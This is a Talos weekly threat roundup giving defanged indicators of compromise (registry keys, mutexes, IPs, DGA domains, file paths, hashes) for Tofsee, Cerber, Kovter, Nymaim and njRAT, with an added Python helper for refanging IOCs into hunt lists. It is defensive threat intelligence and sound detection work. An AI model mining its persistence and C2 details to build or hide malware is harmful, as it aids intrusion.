Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Feb. 19 and Feb. 26. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats are subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

For each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found here that includes the complete list of file hashes, as well as all other IOCs from this post. A visual depiction of the MITRE ATT&CK techniques associated with each threat is also shown. In these images, the brightness of the technique indicates how prevalent it is across all threat files where dynamic analysis was conducted. There are five distinct shades that are used, with the darkest indicating that no files exhibited technique behavior and the brightest indicating that technique behavior was observed from 75 percent or more of the files.
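The IOC tables below use one row per indicator in the form "<defanged value> <occurrences>", with "[.]" in place of every dot, and they mix plain IPs, CIDR ranges (for example a /18 or a /31), domains, and reverse-DNS or DNSBL lookup names that carry a reversed IP in front of the zone. The following Python is an added example (not Talos code and not part of the roundup) showing how a defender can turn those rows back into something a hunt query can use: it refangs each value, classifies it, recovers the IP behind a DNSBL lookup, and groups the result by kind. The sample rows are copied from the format of the lists on this page; the helper names, the "dnsbl_lookup" category and the "checked_ip" bucket are this example's own choices, and the interpretation of a DNSBL name as "the address being checked, not a server contacted" is an inference from the name shape rather than a statement the page makes.

```python
import ipaddress
import re
from dataclasses import dataclass

# Constructed sample: a few rows in the roundup's own "<defanged IOC> <count>"
# row format (one row per line, octets and labels separated by "[.]").
SAMPLE_ROWS = """\
43[.]231[.]4[.]7 9
85[.]93[.]0[.]0/18 10
173[.]194[.]68[.]100/31 11
249[.]5[.]55[.]69[.]in-addr[.]arpa 9
249[.]5[.]55[.]69[.]zen[.]spamhaus[.]org 8
dcrrkfcuq[.]pw 22
www[.]google[.]com 7
"""

ROW_RE = re.compile(r"^(?P<ioc>\S+)\s+(?P<count>\d+)$")


@dataclass(frozen=True)
class Ioc:
    kind: str          # "ip", "cidr", "domain" or "dnsbl_lookup"
    value: str         # refanged form, ready for matching against logs
    occurrences: int   # number of analysed samples that showed the indicator


def refang(defanged: str) -> str:
    """Undo the roundup's "[.]" defanging."""
    return defanged.replace("[.]", ".")


def classify(value: str) -> str:
    """Decide what kind of indicator a refanged value is."""
    try:
        ipaddress.ip_address(value)
        return "ip"
    except ValueError:
        pass
    try:
        ipaddress.ip_network(value, strict=False)
        return "cidr"
    except ValueError:
        pass
    # Reverse-DNS and DNSBL queries put the reversed IP being looked up in
    # front of the zone name; the zone itself is not the indicator.
    if value.endswith(".in-addr.arpa") or re.match(r"^(\d{1,3}\.){4}", value):
        return "dnsbl_lookup"
    return "domain"


def looked_up_ip(value: str) -> str:
    """For a dnsbl_lookup name, recover the queried IP (its labels are reversed)."""
    labels = value.split(".")
    return ".".join(reversed(labels[:4]))


def parse_rows(text: str) -> list:
    """Parse "<defanged IOC> <count>" rows into Ioc records; skip anything else
    (table headers, blank lines and the "*See JSON for more IOCs" notes)."""
    iocs = []
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            continue
        value = refang(m.group("ioc"))
        iocs.append(Ioc(classify(value), value, int(m.group("count"))))
    return iocs


def hunt_list(iocs, min_occurrences: int = 1) -> dict:
    """Group indicators by kind for a hunt query. DNSBL lookups are reduced to
    the IP they query and kept in their own bucket, because that IP is the
    address being checked rather than a server the sample contacted."""
    out = {"ip": set(), "cidr": set(), "domain": set(), "checked_ip": set()}
    for ioc in iocs:
        if ioc.occurrences < min_occurrences:
            continue
        if ioc.kind == "dnsbl_lookup":
            out["checked_ip"].add(looked_up_ip(ioc.value))
        else:
            out[ioc.kind].add(ioc.value)
    return {k: sorted(v) for k, v in out.items()}


if __name__ == "__main__":
    for kind, values in hunt_list(parse_rows(SAMPLE_ROWS)).items():
        print(f"{kind:11s} {values}")
```

Feed it only the IP and domain tables; the file and mutex tables share the row shape and would be classified as "domain". The min_occurrences filter is a prevalence cut, not a maliciousness filter: as the roundup states, rows such as www[.]google[.]com appear because the samples contacted them, not because they are malicious, so the output still needs the usual allow-listing before it becomes a block or alert list.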

The most prevalent threats highlighted in this roundup are:

Threat Name | Type | Description
Win.Packed.Tofsee-9833646-1 | Packed | Tofsee is multi-purpose malware that features a number of modules used to carry out various activities such as sending spam messages, conducting click fraud, mining cryptocurrency, and more. Infected systems become part of the Tofsee spam botnet and are used to send large volumes of spam messages in an effort to infect additional systems and increase the overall size of the botnet under the operator's control.
Win.Ransomware.Cerber-9833115-0 | Ransomware | Cerber is ransomware that encrypts documents, photos, databases and other important files. Historically, this malware would replace files with encrypted versions and add the file extension ".cerber," although in more recent campaigns, other file extensions are used.
Win.Ransomware.Kovter-9833136-1 | Ransomware | Kovter is known for its fileless persistence mechanism. This family of malware creates several malicious registry entries which store its malicious code. Kovter is capable of reinfecting a system, even if the file system has been cleaned of the infection. Kovter has been used in the past to spread ransomware and click-fraud malware.
Win.Malware.Nymaim-9833164-0 | Malware | Nymaim is malware that can be used to deliver ransomware and other malicious payloads. It uses a domain generation algorithm to generate potential command and control (C2) domains to connect to additional payloads.
Win.Packed.njRAT-9833170-1 | Packed | njRAT, also known as Bladabindi, is a remote access trojan (RAT) that allows attackers to execute commands on the infected host, log keystrokes and remotely turn on the victim's webcam and microphone. njRAT was developed by the Sparclyheason group. Some of the largest attacks using this malware date back to 2014.
Win.Packed.CoinMiner-9833198-1 | Packed | This malware installs and executes cryptocurrency mining software. You can read more about this kind of threat on our blog at /blocking-cryptomining.
Win.Trojan.Remcos-9835338-1 | Trojan | Remcos is a remote access trojan (RAT) that allows attackers to execute commands on the infected host, log keystrokes, interact with a webcam and capture screenshots. This malware is commonly delivered through Microsoft Office documents with macros sent as attachments on malicious emails.
Win.Packed.Dridex-9833501-1 | Packed | Dridex is a well-known banking trojan that aims to steal credentials and other sensitive information from an infected machine.
Win.Trojan.Ursu-9833566-0 | Trojan | Ursu is generic malware that has numerous functions. It contacts a C2 server and performs code injection in the address space of legitimate processes. Once Ursu infects a system, it looks to steal confidential information. This malware is commonly spread via email.

Threat Breakdown

Win.Packed.Tofsee-9833646-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 18 samples
Registry Keys | Occurrences
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Type
13
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ErrorControl
13
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ImagePath
13
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: DisplayName
13
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: WOW64
13
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Start
13
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> 13
<HKU>\.DEFAULT\CONTROL PANEL\BUSES 9
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ObjectName
9
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Description
9
<HKU>\.DEFAULT\CONTROL PANEL\BUSES
Value Name: Config2
8
<HKLM>\BCD00000000\OBJECTS\{71A3C7FC-F751-4982-AEC1-E958357E6813}\ELEMENTS\16000009 4
<HKLM>\BCD00000000\OBJECTS\{71A3C7FC-F751-4982-AEC1-E958357E6813}\ELEMENTS\12000002 4
<HKLM>\BCD00000000\OBJECTS\{71A3C7FC-F751-4982-AEC1-E958357E6813}\ELEMENTS\14000006 4
<HKLM>\BCD00000000\OBJECTS\{71A3C7FC-F751-4982-AEC1-E958357E6813}\ELEMENTS\16000048 4
<HKLM>\BCD00000000\OBJECTS\{71A3C7FC-F751-4982-AEC1-E958357E6813}\ELEMENTS\25000020 4
<HKLM>\BCD00000000\OBJECTS\{71A3C7FC-F751-4982-AEC1-E958357E6813}\ELEMENTS\22000002 4
<HKLM>\BCD00000000\OBJECTS\{71A3C7FC-F751-4982-AEC1-E958357E6813}\ELEMENTS\21000001 4
<HKLM>\BCD00000000\OBJECTS\{71A3C7FC-F751-4982-AEC1-E958357E6813}\ELEMENTS\11000001 4
<HKLM>\BCD00000000\OBJECTS\{71A3C7FC-F751-4982-AEC1-E958357E6813} 4
<HKLM>\BCD00000000\OBJECTS\{71A3C7FC-F751-4982-AEC1-E958357E6813}\DESCRIPTION 4
<HKLM>\BCD00000000\OBJECTS\{71A3C7FC-F751-4982-AEC1-E958357E6813}\ELEMENTS 4
<HKLM>\BCD00000000\OBJECTS\{71A3C7FC-F751-4982-AEC1-E958357E6813}\ELEMENTS\12000004 4
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINMON 4
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINMON\SECURITY 4
Mutexes | Occurrences
Global\SetupLog 4
Global\WdsSetupLogInit 4
Global\h48yorbq6rm87zot 4
Global\ewzy5hgt3x5sof4v 4
Global\xmrigMUTEX31337 4
WininetConnectionMutex 4
Global\wpsSerMutex2 3
DNcyagdluDonKsuVmC 2
Global\52e0e5c1-7401-11eb-b5f8-00501e3ae7b6 1
IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
43[.]231[.]4[.]7 9
185[.]254[.]190[.]218 9
157[.]240[.]18[.]174 8
217[.]172[.]179[.]54 8
5[.]9[.]72[.]48 8
130[.]0[.]232[.]208 8
144[.]76[.]108[.]82 8
185[.]253[.]217[.]20 8
45[.]90[.]34[.]87 8
172[.]217[.]12[.]132 7
87[.]250[.]250[.]22 7
104[.]47[.]54[.]36 7
23[.]216[.]244[.]163 7
216[.]239[.]34[.]21 6
216[.]239[.]36[.]21 6
104[.]47[.]22[.]161 6
23[.]5[.]227[.]69 5
37[.]1[.]217[.]172 5
163[.]172[.]32[.]74 5
23[.]10[.]134[.]216 5
209[.]85[.]232[.]99 4
157[.]240[.]2[.]174 4
67[.]195[.]204[.]151 4
204[.]79[.]197[.]219 4
23[.]3[.]13[.]88 4

*See JSON for more IOCs

Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
249[.]5[.]55[.]69[.]in-addr[.]arpa 9
microsoft-com[.]mail[.]protection[.]outlook[.]com 9
microsoft[.]com 9
249[.]5[.]55[.]69[.]bl[.]spamcop[.]net 8
249[.]5[.]55[.]69[.]cbl[.]abuseat[.]org 8
249[.]5[.]55[.]69[.]dnsbl[.]sorbs[.]net 8
249[.]5[.]55[.]69[.]sbl-xbl[.]spamhaus[.]org 8
249[.]5[.]55[.]69[.]zen[.]spamhaus[.]org 8
www[.]amazon[.]com 8
www[.]instagram[.]com 8
schema[.]org 7
accounts[.]google[.]com 7
drive[.]google[.]com 7
mail[.]google[.]com 7
maps[.]google[.]com 7
market[.]yandex[.]ru 7
news[.]google[.]com 7
play[.]google[.]com 7
www[.]youtube[.]com 7
www[.]google[.]com 7
ctldl[.]windowsupdate[.]com 6
a767[.]dscg3[.]akamai[.]net 5
ip[.]pr-cy[.]hacklix[.]com 5
iv0001-npxs01001-00[.]auth[.]np[.]ac[.]playstation[.]net 5
work[.]a-poster[.]info 5

*See JSON for more IOCs

Files and/or directories created | Occurrences
%TEMP%\<random, matching '[a-z]{8}'>.exe 13
%SystemRoot%\SysWOW64\config\systemprofile 9
%SystemRoot%\SysWOW64\config\systemprofile:.repos 9
%SystemRoot%\SysWOW64\<random, matching '[a-z]{8}'> 9
%System32%\config\systemprofile:.repos 9
%System32%\<random, matching '[a-z]{8}\[a-z]{6,8}'>.exe (copy) 5
%SystemRoot%\Logs\CBS\CBS.log 4
%SystemRoot%\rss 4
%SystemRoot%\rss\csrss.exe 4
%TEMP%\csrss 4
%TEMP%\csrss\dsefix.exe 4
%TEMP%\csrss\patch.exe 4
%System32%\drivers\Winmon.sys 4
%System32%\drivers\WinmonFS.sys 4
%System32%\drivers\WinmonProcessMonitor.sys 4
%TEMP%\Symbols 4
%TEMP%\Symbols\ntkrnlmp.pdb 4
%TEMP%\Symbols\ntkrnlmp.pdb\9E22A5947A15489895CE716436B45BE02 4
%TEMP%\Symbols\ntkrnlmp.pdb\9E22A5947A15489895CE716436B45BE02\download.error 4
%TEMP%\Symbols\pingme.txt 4
%TEMP%\Symbols\winload_prod.pdb 4
%TEMP%\Symbols\winload_prod.pdb\B7B16B17E078406E806A050C8BEE2E361 4
%TEMP%\Symbols\winload_prod.pdb\B7B16B17E078406E806A050C8BEE2E361\download.error 4
%TEMP%\dbghelp.dll 4
%TEMP%\symsrv.dll 4

*See JSON for more IOCs

File Hashes

Coverage

Product | Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Ransomware.Cerber-9833115-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 11 samples
Registry Keys | Occurrences
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER
Value Name: Run
10
<HKCU>\SOFTWARE\MICROSOFT\COMMAND PROCESSOR
Value Name: AutoRun
10
<HKCU>\PRINTERS\DEFAULTS\{21A3D5EE-E123-244A-98A1-8E36C26EFF6D} 10
<HKCU>\PRINTERS\DEFAULTS 10
<HKCU>\PRINTERS\DEFAULTS\{21A3D5EE-E123-244A-98A1-8E36C26EFF6D}
Value Name: Component_01
10
<HKCU>\PRINTERS\DEFAULTS\{21A3D5EE-E123-244A-98A1-8E36C26EFF6D}
Value Name: Component_00
10
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: wimserv
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: wimserv
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: ntkrnlpa
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: ntkrnlpa
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: TSTheme
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: TSTheme
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: eventvwr
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: eventvwr
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: fc
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: fc
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: at
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: at
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: ReAgentc
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: ReAgentc
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: sdchange
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: sdchange
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: unlodctr
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: unlodctr
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: WPDShextAutoplay
1
Mutexes | Occurrences
shell.{381828AA-8B28-3374-1B67-35680555C5EF} 10
Frz_State 10
shell.{<random GUID>} 10
IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
85[.]93[.]0[.]0/18 10
Files and/or directories created | Occurrences
%APPDATA%\{6F885251-E36F-0FE6-9629-63208157D7A2} 10
%APPDATA%\Microsoft\Windows\Start Menu\Programs\StartUp\eventvwr.lnk 1
%APPDATA%\{6F885251-E36F-0FE6-9629-63208157D7A2}\eventvwr.exe 1
%System32%\Tasks\wimserv 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\StartUp\wimserv.lnk 1
%APPDATA%\{6F885251-E36F-0FE6-9629-63208157D7A2}\wimserv.exe 1
%System32%\Tasks\eventvwr 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\StartUp\sdchange.lnk 1
%APPDATA%\{6F885251-E36F-0FE6-9629-63208157D7A2}\sdchange.exe 1
%System32%\Tasks\sdchange 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\StartUp\at.lnk 1
%APPDATA%\{6F885251-E36F-0FE6-9629-63208157D7A2}\at.exe 1
%System32%\Tasks\at 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\StartUp\fc.lnk 1
%APPDATA%\{6F885251-E36F-0FE6-9629-63208157D7A2}\fc.exe 1
%System32%\Tasks\fc 1
%System32%\Tasks\ntkrnlpa 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\StartUp\ntkrnlpa.lnk 1
%APPDATA%\{6F885251-E36F-0FE6-9629-63208157D7A2}\ntkrnlpa.exe 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\StartUp\unlodctr.lnk 1
%APPDATA%\{6F885251-E36F-0FE6-9629-63208157D7A2}\unlodctr.exe 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\StartUp\TSTheme.lnk 1
%APPDATA%\{6F885251-E36F-0FE6-9629-63208157D7A2}\TSTheme.exe 1
%System32%\Tasks\unlodctr 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\StartUp\ReAgentc.lnk 1

*See JSON for more IOCs

File Hashes

02b265f4d4743586c8d060f43dac872f617bea4211979e3c4de291a1fd2dbeab
1c0afc71808c9204a208791841e9f2fedf7a15f2d262d87cf270729d351e6a66
284dae8aa042a069dd0f8b3f2b802566e528bb28e7483c91e7fe414619807668
29e31b81930067f1ee57a9331217a21264c4717e15f272ae60de56451ae7f6b3
323e92297b154f1877a7f3980d18de98bc8e1fdfcd92339c3f706d0284abb522
53003b37fae55889b7a594122def69c18e0668999939586cbad9e1850ab684de
86530bf646068f707f799a8a5422e5e5468d18df117cf02cd9e8b5f69a22d163
8af81aeaf846f4a71085ed1abf063b8e8b4ff87b10805cdb703850954fd58cd4
a0b463ad143af62657991abed04c6e1e652aacd83597b1ffd1ccd601a761ef4a
ceec5ccdf87cd9d1a986798a26fdf602331ab552c0d12279e60d1984e503d2ee
e126e3d595ed5fb389aad77a378cbbff627875efccde879ceb2f69466a6338de

Coverage

Product | Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Ransomware.Kovter-9833136-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 12 samples
Registry Keys | Occurrences
<HKLM>\SOFTWARE\WOW6432NODE\3A91C13AB1
Value Name: 96f717b3
12
<HKCU>\SOFTWARE\3A91C13AB1
Value Name: 96f717b3
12
<HKLM>\SOFTWARE\WOW6432NODE\3A91C13AB1
Value Name: 656f27d6
12
<HKCU>\SOFTWARE\3A91C13AB1
Value Name: 656f27d6
12
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN 12
<HKCU>\SOFTWARE\3A91C13AB1 12
<HKLM>\SOFTWARE\WOW6432NODE\3A91C13AB1 12
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.101
Value Name: CheckSetting
12
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.103
Value Name: CheckSetting
12
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.100
Value Name: CheckSetting
12
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.102
Value Name: CheckSetting
12
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.104
Value Name: CheckSetting
12
<HKLM>\SOFTWARE\WOW6432NODE\3A91C13AB1
Value Name: ffcfae7b
12
<HKCU>\SOFTWARE\3A91C13AB1
Value Name: ffcfae7b
12
<HKCU>\SOFTWARE\3A91C13AB1
Value Name: 78758f10
12
<HKLM>\SOFTWARE\WOW6432NODE\3A91C13AB1
Value Name: 78758f10
12
<HKCU>\SOFTWARE\3A91C13AB1
Value Name: c3ab6058
12
<HKLM>\SOFTWARE\WOW6432NODE\3A91C13AB1
Value Name: c3ab6058
12
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: 8567f942
12
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN
Value Name: e7ec9eed
12
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: 8567f942
12
<HKLM>\SOFTWARE\WOW6432NODE\3A91C13AB1
Value Name: 01b2a448
10
<HKCU>\SOFTWARE\3A91C13AB1
Value Name: 01b2a448
10
<HKLM>\SOFTWARE\WOW6432NODE\174127A8DFD6952D52 1
<HKLM>\SOFTWARE\WOW6432NODE\JHJONDY 1
Mutexes | Occurrences
EA4EC370D1E573DA 12
A83BAA13F950654C 12
Global\7A7146875A8CDE1E 12
B3E8F6F86CDD9D8B 12
563CCFFF6B36C3AB 11
2070A5364843D9D3 11
Global\B2A01B9EB1B404AD 11
IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
39[.]41[.]74[.]205 1
77[.]202[.]113[.]6 1
89[.]101[.]88[.]42 1
97[.]20[.]114[.]223 1
62[.]28[.]76[.]51 1
88[.]141[.]17[.]182 1
137[.]198[.]55[.]19 1
21[.]156[.]102[.]3 1
158[.]15[.]118[.]150 1
12[.]58[.]62[.]253 1
137[.]235[.]50[.]180 1
82[.]91[.]169[.]186 1
196[.]148[.]247[.]198 1
105[.]69[.]77[.]222 1
114[.]126[.]180[.]231 1
151[.]145[.]81[.]78 1
23[.]244[.]235[.]167 1
130[.]245[.]123[.]90 1
164[.]226[.]36[.]205 1
171[.]174[.]77[.]112 1
191[.]8[.]153[.]111 1
63[.]31[.]92[.]80 1
160[.]37[.]10[.]183 1
51[.]25[.]1[.]206 1
142[.]154[.]222[.]111 1

*See JSON for more IOCs

Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
www[.]baidu[.]com 1
www[.]wshifen[.]com 1
cp[.]aliyun[.]com 1
netcn[.]console[.]aliyun[.]com 1
www[.]altn[.]com 1
jordandevolder[.]freeboxos[.]fr 1

File Hashes

Coverage

Product | Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Malware.Nymaim-9833164-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 23 samples
Registry Keys | Occurrences
<HKCU>\SOFTWARE\MICROSOFT\GOCFK 23
<HKCU>\SOFTWARE\MICROSOFT\GOCFK
Value Name: mbijg
23
Mutexes | Occurrences
Local\{0CCE1A6D-10E1-4330-6D33-59F9418C9024} 23
Local\{1181F583-B634-69BF-E703-D4756599024F} 23
Local\{180BBEAD-0447-044A-68BD-247EB6D0E352} 23
Local\{18DD7903-1E96-FEAF-92BF-014008A1248C} 23
Local\{65E26329-DE88-D536-CB3A-203091D3DF68} 23
Local\{92502033-C012-7F46-D6A8-0AC972DF6662} 23
Local\{25754F3F-7A37-56CA-31BB-3C9D33DA226B} 23
Local\{8B75523D-CAF4-D06B-A2AD-13EEF593AC52} 23
Local\{D2CC4CCA-CB77-CF10-8293-17C78DEC853F} 23
Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
microsoft[.]com 23
google[.]com 23
dcrrkfcuq[.]pw 22
djvxzgguj[.]pw 22
hbomnx[.]net 22
hhqpe[.]in 22
jimnouitvsah[.]in 22
nkguoc[.]pw 22
onjytulzjho[.]net 22
qfdhb[.]com 22
qkolgzehfwc[.]com 22
swhuuebusn[.]pw 22
tqlwoqyjxwhx[.]in 22
usqkmt[.]net 22
vqncbn[.]in 22
xnqtr[.]com 22
ykdkhdytpcs[.]net 22
aiudzabvzp[.]in 1
bkyktgi[.]in 1
ccaqofkyvpz[.]net 1
eciimwrswhwq[.]pw 1
ecuhmpuhdoff[.]net 1
emvqxhipzz[.]net 1
ljcafafzcz[.]net 1
mlgpku[.]pw 1

*See JSON for more IOCs

Files and/or directories created | Occurrences
%ProgramData%\ph 23
%ProgramData%\ph\fktiipx.ftf 23
%TEMP%\gocf.ksv 23
%ProgramData%\jzk\icolry.ylg 23
%TEMP%\qnvgtx.eww 23
%ProgramData%\<random, matching '[a-z0-9]{3,7}'> 23
%APPDATA%\<random, matching '[a-z0-9]{3,7}'> 23
%LOCALAPPDATA%\<random, matching '[a-z0-9]{3,7}'> 23
%LOCALAPPDATA%\8w9 10
%APPDATA%\akwr35 10
%ProgramData%\5ltk 10

File Hashes

027eb50a323c9a64411fa32ed72eb0a9cbefb7f0a7a7c91072c5167768543bee
0d407e709625354e5061de9ae8d8f7d3a6de00335d2d2958e8810c7ebc298231
17cf7375748d5b3279643a920833f0802362698e3a3f86ecdd4c647f6becd962
29486237a4a0ae9fbaa7818ab21976338fd8e60b8cccdf5a6ed5e2a9361a2a2c
4aa98e131fe70965a8d8ab4ad09d496b69df33ce002c118836b05b568f34de62
5be2fc4c8d59abddd487be30063798bd4c5f13a9a5053b79faf585c60625be80
5bec3cc7247f29d33baf13e50235787440c23f7a85a8ea39742a304b6f6e42e2
69a26a27120e7a19d7a2de970cf2f03708748808e31fcc58165efe42f0cb6cb1
6a952db179e898736f289a945027169d7f37aefe6301ed68820fc502e4b2acbc
70c77ba9ffd9be299a806dd76e48ee2b07282c2d289b22e3d93c36228d50a85a
82b42e4fe14922995be5e3c428c6472d2ce8195cb299f80804f86da0cca32e4f
917d92b3abe443d5a30d8580c8a3f05ead1310dab993507c93f5b6f562283b5e
96755cfa43314ea56aca17a7d626f2275244e508d79465a3955484dd14f23634
9865853b7b72f281ce7d42970db23926395cfe246eaff9839fcde8c542497ecf
ae181cf422359fd0f829ea1e7421557a47fbe7c2ce2b0e1c2cc5b7313914470b
e0b2a87a77ad32ded7b8ca5f2ae3c7195bded9e525f4feb91f8e0c1b5bfa5522
e1bd68b699bd216423adebd9df3f586cceca8f90407a633f68a21f05068ffb7c
e236c9c2873df64284a4eae81c94a4f7de632c31236352f1e2fae4ca4a3d3fd7
e34b945244705711e8db253bc49969b00426dd61408bd0d48c6527e23249b7c8
e73bfb970fbfbe2ee525a381fe297353db86e28a646eb49ed5eda67e422495a6
eb61100dd1555b46a0ffa05035231ff61c85292c327659f9a2c86db715c10d2a
f515ddedac2d22db20265173cf39be8f486ce7fc2982c85b1b2e8d0bdf31823e
faec5be0de3f61425f674be3fb0a1f46e6a03ade19bffd26959912b6407d9aae

Coverage

Product | Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Packed.njRAT-9833170-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 15 samples
Registry Keys | Occurrences
<HKCU>\ENVIRONMENT
Value Name: SEE_MASK_NOZONECHECKS
15
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON
Value Name: ParseAutoexec
15
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: ba4c12bee3027d94da5c81db2d196bfd
4
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: ba4c12bee3027d94da5c81db2d196bfd
4
<HKCU>\SOFTWARE\BA4C12BEE3027D94DA5C81DB2D196BFD
Value Name: US
4
<HKCU>\SOFTWARE\BA4C12BEE3027D94DA5C81DB2D196BFD 4
<HKCU>\SOFTWARE\772D3E1CF411932582BA4607CAF9D2F7
Value Name: US
2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: 772d3e1cf411932582ba4607caf9d2f7
2
